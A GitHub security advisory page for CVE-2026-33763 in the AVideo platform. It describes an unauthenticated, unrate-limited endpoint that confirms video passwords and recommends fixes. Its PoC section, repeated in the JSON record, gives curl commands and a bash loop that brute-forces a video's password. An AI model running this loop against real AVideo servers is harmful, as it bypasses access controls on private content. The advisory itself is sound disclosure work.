GHSA-8PRQ-2JR2-CM92

Vulnerability from github – Published: 2026-03-26 18:07 – Updated: 2026-03-27 21:38
VLAI?
Summary
AVideo has an Unauthenticated Video Password Brute-Force Vulnerability via Unrate-Limited Boolean Oracle
Details

Summary

The get_api_video_password_is_correct API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean passwordIsCorrect field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords.

Details

The vulnerable endpoint is defined at plugin/API/API.php:1111-1133:

public function get_api_video_password_is_correct($parameters)
{
    $obj = new stdClass();
    $obj->videos_id = intval($parameters['videos_id']);
    $obj->passwordIsCorrect = true;
    $error = true;
    $msg = '';

    if (!empty($obj->videos_id)) {
        $error = false;
        $video = new Video('', '', $obj->videos_id);
        $password = $video->getVideo_password();
        if (!empty($password)) {
            $obj->passwordIsCorrect = $password == $parameters['video_password'];
        }
    } else {
        $msg = 'Videos id is required';
    }

    return new ApiObject($msg, $error, $obj);
}

The get() dispatcher at API.php:191-209 routes GET requests directly to this method without any authentication enforcement:

public function get($parameters) {
    // ... optional user login if credentials provided ...
    $APIName = $parameters['APIName'];
    if (method_exists($this, "get_api_$APIName")) {
        $str = "\$object = \$this->get_api_$APIName(\$parameters);";
        eval($str);
    }
}

The application has a checkRateLimit() mechanism (line 5737) that is applied to user registration (line 4232) and user deactivation (line 5705), but is not applied to this password verification endpoint.

Additionally, video passwords are stored in plaintext (objects/video.php:523-527):

public function setVideo_password($video_password) {
    AVideoPlugin::onVideoSetVideo_password($this->id, $this->video_password, $video_password);
    $this->video_password = trim($video_password);
}

The comparison at line 1125 uses loose equality (==) rather than strict equality (===).

PoC

Step 1: Identify a password-protected video

curl -s "http://localhost/plugin/API/get.json.php?APIName=video&videos_id=1" | jq '.response.rows[0].video_password'

A non-empty value (e.g., "1") indicates the video is password-protected.

Step 2: Test incorrect password (oracle returns false)

curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=wrongguess"

Expected response:

{"response":{"videos_id":1,"passwordIsCorrect":false},"error":false}

Step 3: Brute-force the password

for pw in password 123456 secret admin test video1 qwerty; do
  result=$(curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=$pw" | jq -r '.response.passwordIsCorrect')
  echo "$pw: $result"
  [ "$result" = "true" ] && echo "FOUND: $pw" && break
done

No rate limiting is encountered regardless of request volume.

Step 4: Unlock the video with the discovered password

curl -s "http://localhost/view/video.php?v=1&video_password=DISCOVERED_PASSWORD" -c cookies.txt

The password is stored in the session (CustomizeUser.php:806-807) granting persistent access.

Impact

An attacker can brute-force the password of any password-protected video on the platform without authentication. Since video passwords are typically simple shared secrets (not per-user credentials), common password dictionaries are likely to succeed quickly. Successful exploitation bypasses the access control for password-protected content, which may include commercially sensitive, private, or restricted video content. The lack of any rate limiting means an attacker can test thousands of passwords per second.

Recommended Fix

  1. Add rate limiting to the endpoint using the existing checkRateLimit() mechanism:
public function get_api_video_password_is_correct($parameters)
{
    $this->checkRateLimit('video_password_check', 5, 300); // 5 attempts per 5 minutes per IP

    $obj = new stdClass();
    $obj->videos_id = intval($parameters['videos_id']);
    // ... rest of existing code
}
  1. Hash video passwords using password_hash()/password_verify() instead of plaintext storage and loose comparison:
// In setVideo_password:
$this->video_password = password_hash(trim($video_password), PASSWORD_DEFAULT);

// In the check endpoint:
$obj->passwordIsCorrect = password_verify($parameters['video_password'], $password);
  1. Use strict comparison (===) if plaintext passwords must be retained temporarily during migration.
Severity ?
5.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33763"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-26T18:07:38Z",
    "nvd_published_at": "2026-03-27T15:16:58Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords.\n\n## Details\n\nThe vulnerable endpoint is defined at `plugin/API/API.php:1111-1133`:\n\n```php\npublic function get_api_video_password_is_correct($parameters)\n{\n    $obj = new stdClass();\n    $obj-\u003evideos_id = intval($parameters[\u0027videos_id\u0027]);\n    $obj-\u003epasswordIsCorrect = true;\n    $error = true;\n    $msg = \u0027\u0027;\n\n    if (!empty($obj-\u003evideos_id)) {\n        $error = false;\n        $video = new Video(\u0027\u0027, \u0027\u0027, $obj-\u003evideos_id);\n        $password = $video-\u003egetVideo_password();\n        if (!empty($password)) {\n            $obj-\u003epasswordIsCorrect = $password == $parameters[\u0027video_password\u0027];\n        }\n    } else {\n        $msg = \u0027Videos id is required\u0027;\n    }\n\n    return new ApiObject($msg, $error, $obj);\n}\n```\n\nThe `get()` dispatcher at `API.php:191-209` routes GET requests directly to this method without any authentication enforcement:\n\n```php\npublic function get($parameters) {\n    // ... optional user login if credentials provided ...\n    $APIName = $parameters[\u0027APIName\u0027];\n    if (method_exists($this, \"get_api_$APIName\")) {\n        $str = \"\\$object = \\$this-\u003eget_api_$APIName(\\$parameters);\";\n        eval($str);\n    }\n}\n```\n\nThe application has a `checkRateLimit()` mechanism (line 5737) that is applied to user registration (line 4232) and user deactivation (line 5705), but is **not** applied to this password verification endpoint.\n\nAdditionally, video passwords are stored in plaintext (`objects/video.php:523-527`):\n\n```php\npublic function setVideo_password($video_password) {\n    AVideoPlugin::onVideoSetVideo_password($this-\u003eid, $this-\u003evideo_password, $video_password);\n    $this-\u003evideo_password = trim($video_password);\n}\n```\n\nThe comparison at line 1125 uses loose equality (`==`) rather than strict equality (`===`).\n\n## PoC\n\n**Step 1: Identify a password-protected video**\n\n```bash\ncurl -s \"http://localhost/plugin/API/get.json.php?APIName=video\u0026videos_id=1\" | jq \u0027.response.rows[0].video_password\u0027\n```\n\nA non-empty value (e.g., `\"1\"`) indicates the video is password-protected.\n\n**Step 2: Test incorrect password (oracle returns false)**\n\n```bash\ncurl -s \"http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct\u0026videos_id=1\u0026video_password=wrongguess\"\n```\n\nExpected response:\n```json\n{\"response\":{\"videos_id\":1,\"passwordIsCorrect\":false},\"error\":false}\n```\n\n**Step 3: Brute-force the password**\n\n```bash\nfor pw in password 123456 secret admin test video1 qwerty; do\n  result=$(curl -s \"http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct\u0026videos_id=1\u0026video_password=$pw\" | jq -r \u0027.response.passwordIsCorrect\u0027)\n  echo \"$pw: $result\"\n  [ \"$result\" = \"true\" ] \u0026\u0026 echo \"FOUND: $pw\" \u0026\u0026 break\ndone\n```\n\nNo rate limiting is encountered regardless of request volume.\n\n**Step 4: Unlock the video with the discovered password**\n\n```bash\ncurl -s \"http://localhost/view/video.php?v=1\u0026video_password=DISCOVERED_PASSWORD\" -c cookies.txt\n```\n\nThe password is stored in the session (`CustomizeUser.php:806-807`) granting persistent access.\n\n## Impact\n\nAn attacker can brute-force the password of any password-protected video on the platform without authentication. Since video passwords are typically simple shared secrets (not per-user credentials), common password dictionaries are likely to succeed quickly. Successful exploitation bypasses the access control for password-protected content, which may include commercially sensitive, private, or restricted video content. The lack of any rate limiting means an attacker can test thousands of passwords per second.\n\n## Recommended Fix\n\n1. **Add rate limiting** to the endpoint using the existing `checkRateLimit()` mechanism:\n\n```php\npublic function get_api_video_password_is_correct($parameters)\n{\n    $this-\u003echeckRateLimit(\u0027video_password_check\u0027, 5, 300); // 5 attempts per 5 minutes per IP\n\n    $obj = new stdClass();\n    $obj-\u003evideos_id = intval($parameters[\u0027videos_id\u0027]);\n    // ... rest of existing code\n}\n```\n\n2. **Hash video passwords** using `password_hash()`/`password_verify()` instead of plaintext storage and loose comparison:\n\n```php\n// In setVideo_password:\n$this-\u003evideo_password = password_hash(trim($video_password), PASSWORD_DEFAULT);\n\n// In the check endpoint:\n$obj-\u003epasswordIsCorrect = password_verify($parameters[\u0027video_password\u0027], $password);\n```\n\n3. **Use strict comparison** (`===`) if plaintext passwords must be retained temporarily during migration.",
  "id": "GHSA-8prq-2jr2-cm92",
  "modified": "2026-03-27T21:38:24Z",
  "published": "2026-03-26T18:07:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33763"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has an Unauthenticated Video Password Brute-Force Vulnerability via Unrate-Limited Boolean Oracle"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.